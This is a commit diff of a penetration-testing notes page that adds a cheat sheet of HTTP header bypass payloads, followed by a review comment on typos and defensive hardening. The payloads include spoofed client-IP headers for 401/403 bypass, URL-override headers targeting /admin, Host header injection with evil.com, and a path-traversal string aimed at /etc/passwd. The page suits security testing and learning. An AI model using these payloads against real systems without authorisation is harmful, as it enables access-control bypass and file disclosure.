Commit f327b09

zweilosec authored and gitbook-bot committed
GitBook: [master] one page modified
1 parent e5796ed commit f327b09

File tree

1 file changed

+105
-5
lines changed

web/web-notes/README.md

Lines changed: 105 additions & 5 deletions
@@ -210,11 +210,7 @@ finger batman@$ip
210210
nikto -useproxy http://$ip:3128 -h $ip
211211
```
212212

213-
### Cookies
214-
215-
* [https://cookiepedia.co.uk/](https://cookiepedia.co.uk/)
216-
* "Largest Database of Pre-Categorized Cookies"
217-
* Scans a website for cookie usage
213+
## Headers
218214

219215
### HTTP Authorization headers
220216

@@ -257,6 +253,110 @@ Authorization: AWS4-HMAC-SHA256 Credential=abc/20200618/us-east-1/execute-api/aw
257253
* [https://www.netsparker.com/whitepaper-http-security-headers/](https://www.netsparker.com/whitepaper-http-security-headers/)
258254
* [https://owasp.org/www-project-secure-headers/](https://owasp.org/www-project-secure-headers/)
259255

256+
### Header Bypass Methods
257+
258+
```bash
259+
# Add something like 127.0.0.1, localhost, 192.168.1.2, target.com or /admin, /console
260+
Client-IP:
261+
Connection:
262+
Contact:
263+
Forwarded:
264+
From:
265+
Host:
266+
Origin:
267+
Referer:
268+
True-Client-IP:
269+
X-Client-IP:
270+
X-Custom-IP-Authorization:
271+
X-Forward-For:
272+
X-Forwarded-For:
273+
X-Forwarded-Host:
274+
X-Forwarded-Server:
275+
X-Host:
276+
X-Original-URL:
277+
X-Originating-IP:
278+
X-Real-IP:
279+
X-Remote-Addr:
280+
X-Remote-IP:
281+
X-Rewrite-URL:
282+
X-Wap-Profile:
283+
284+
# Try to repeat same Host header 2 times
285+
Host: legit.com
286+
Stuff: stuff
287+
Host: evil.com
288+
289+
# Bypass type limit
290+
Accept: application/json, text/javascript, */*; q=0.01
291+
Accept: ../../../../../../../../../etc/passwd{{'
292+
293+
# Try to change the HTTP version from 1.1 to HTTP/0.9 and remove the host header
294+
295+
# 401/403 bypasses
296+
# Whitelisted IP 127.0.0.1 or localhost
297+
Client-IP: 127.0.0.1
298+
Forwarded-For-Ip: 127.0.0.1
299+
Forwarded-For: 127.0.0.1
300+
Forwarded-For: localhost
301+
Forwarded: 127.0.0.1
302+
Forwarded: localhost
303+
True-Client-IP: 127.0.0.1
304+
X-Client-IP: 127.0.0.1
305+
X-Custom-IP-Authorization: 127.0.0.1
306+
X-Forward-For: 127.0.0.1
307+
X-Forward: 127.0.0.1
308+
X-Forward: localhost
309+
X-Forwarded-By: 127.0.0.1
310+
X-Forwarded-By: localhost
311+
X-Forwarded-For-Original: 127.0.0.1
312+
X-Forwarded-For-Original: localhost
313+
X-Forwarded-For: 127.0.0.1
314+
X-Forwarded-For: localhost
315+
X-Forwarded-Server: 127.0.0.1
316+
X-Forwarded-Server: localhost
317+
X-Forwarded: 127.0.0.1
318+
X-Forwarded: localhost
319+
X-Forwared-Host: 127.0.0.1
320+
X-Forwared-Host: localhost
321+
X-Host: 127.0.0.1
322+
X-Host: localhost
323+
X-HTTP-Host-Override: 127.0.0.1
324+
X-Originating-IP: 127.0.0.1
325+
X-Real-IP: 127.0.0.1
326+
X-Remote-Addr: 127.0.0.1
327+
X-Remote-Addr: localhost
328+
X-Remote-IP: 127.0.0.1
329+
330+
# Fake Origin - make GET request to accesible endpoint with:
331+
X-Original-URL: /admin
332+
X-Override-URL: /admin
333+
X-Rewrite-URL: /admin
334+
Referer: /admin
335+
# Also try with absolute url https:/domain.com/admin
336+
337+
# Method Override
338+
X-HTTP-Method-Override: PUT
339+
340+
# Provide full path GET
341+
GET https://vulnerable-website.com/ HTTP/1.1
342+
Host: evil-website.com
343+
344+
# Add line wrapping
345+
GET /index.php HTTP/1.1
346+
Host: vulnerable-website.com
347+
Host: evil-website.com
348+
349+
# Wordlists
350+
https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/BurpSuite-ParamMiner/lowercase-headers
351+
https://github.com/danielmiessler/SecLists/tree/bbb4d86ec1e234b5d3cfa0a4ab3e20c9d5006405/Miscellaneous/web/http-request-headers
352+
```
353+
354+
## Cookies
355+
356+
* [https://cookiepedia.co.uk/](https://cookiepedia.co.uk/)
357+
* "Largest Database of Pre-Categorized Cookies"
358+
* Scans a website for cookie usage
359+
260360
## OpenVAS Vulnerability Scanner
261361
262362
```bash
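Review bot: several header names and URLs in this hunk carry typos that will make the cheat sheet fail silently when copied: `X-Forwared-Host: 127.0.0.1` and `X-Forwared-Host: localhost` should read `X-Forwarded-Host`, the comment `make GET request to accesible endpoint` should be `accessible`, and the absolute URL example `https:/domain.com/admin` is missing a slash. The RFC 7239 form is `Forwarded: for=127.0.0.1`, so the bare `Forwarded: 127.0.0.1` / `Forwarded: localhost` lines should either use that syntax or be labelled as a non-standard variant; `Forwarded-For` and `Forwarded-For-Ip` likewise do not match any standard name and are worth flagging as guesses next to `X-Forwarded-For`. The `# Add line wrapping` block is indistinguishable from the earlier `# Try to repeat same Host header 2 times` block as rendered (two `Host:` lines, no continuation whitespace); if the intent is obsolete line folding, the second line needs a leading space or tab, otherwise the comment should say what differs. Finally, `Accept: ../../../../../../../../../etc/passwd{{'` under `# Bypass type limit` has no explanation of what it is probing; a one-line comment would help. From the defensive side, the whole 401/403 list is a good argument for only honouring `X-Forwarded-*`, `X-Real-IP` and URL-override headers when the request arrives from a configured trusted proxy, and for stripping them at the edge otherwise; a sentence to that effect would make the section more than a bare list.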
